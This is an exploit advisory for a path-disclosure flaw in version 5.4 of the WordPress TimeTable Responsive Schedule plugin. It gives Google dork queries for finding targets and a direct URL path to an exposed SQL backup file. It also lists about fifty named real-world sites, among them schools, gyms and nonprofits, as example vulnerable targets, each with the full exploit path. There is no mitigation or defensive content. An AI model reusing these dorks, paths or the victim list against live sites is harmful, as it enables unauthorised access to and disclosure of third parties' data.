#################################################################################################
# Exploit Title : WordPress TimeTable Responsive Schedule Plugins 5.4 Database Backup Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 08/12/2018
# Vendor Homepage : wordpress.org ~ codecanyon.net
# Software Download Link : codecanyon.net/item/timetable-responsive-schedule-for-wordpress/7010836
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 5.4
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/plugins/timetable/dummy-content-files/''
intext:''Powered by Tempera & WordPress.''
intext:''Site built by Mustard''
intext:''© 2018 Westminster Academy''
intext:''Designed by Brandyou.ie''
intext:''All Rights Reserved by WebCorp.gt''
intext:''Built By Marketing Sweet'' site:au
intext:''Website Design Victor Harbor - WebMarketSmart.com''
intext:''Maintained by OMTech'' site:il
intext:''© Todos los derechos reservados. Givinn 2017''
intext:''Site internet par UMAO'' site:fr
intext:''© 2018 - Fitness Zone. Design: Design Themes''
intext:''Desarrollado por www.grupoorigami.cl''
intext:''Webdesign realizat de Idea Perpetua.''
# PacketStormSecurity Exploit Link : packetstormsecurity.com/files/150709/WordPress-TimeTable-Responsive-Schedule-5.4-Database-Disclosure.html
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
#################################################################################################
-- phpMyAdmin SQL Dump
-- version 4.1.8
-- phpmyadmin.net
--
-- Host: localhost
-- Server version: 5.1.73-cll
-- PHP Version: 5.4.23
#################################################################################################
# Admin Panel Login Path :
/wp-login.php
# Exploit :
/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
#################################################################################################
# Example Vulnerable Site =>
[+] wa.edu/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] rockford.edu.pk/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] scpap.cz/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] despomar.com/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] polcon2018.org/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] folkeast.co.uk/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] coolrooms.com/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] seproes.com/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] lindani.co.za/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] pcclinic.pt/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] krateseye.com/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] nacpc.org/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] akademitahfizmandarin.com/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] combatnerf.ca/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] athensmha.org/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] marshallspark.org.uk/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] sbdac.com/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] medfit.org/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] soaznp.com/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] gospel.tv/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] prc.ie/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] indratek.com/demos/goobecmexico/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] lykeo.com/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] crossfitthreeflow.com/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] martiokul.com/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] gkoled.com/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] helsingborgmarathon.se/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] mensajeriaexpressguatemala.com/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] idercexa.eu/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] oceanblueomega.com/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] orcunkurum.com/orcunkurum/orcunjz/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] ekilibrate.com/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] ess2018.com/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] vhcoc.org/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] exidom.com.au/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] sweetspace.tw/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] estilodeaprender.com.br/educacao/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] tnhimss.org/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] ella.omtech.co.il/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] adhikarayoga.com/web/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] vessi.cl/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] jumfil.fr/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] shatibi.fr/wordpress/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] lateletuya.com/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] fotogankel.no/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] nailash.mx/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] oajlpgym.fr/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] mag-boxing.fr/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] teledoc.cl/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] bluelife.ro/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] purefitness.gr/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] loie.fr/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] fnf.org.bo/portal/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################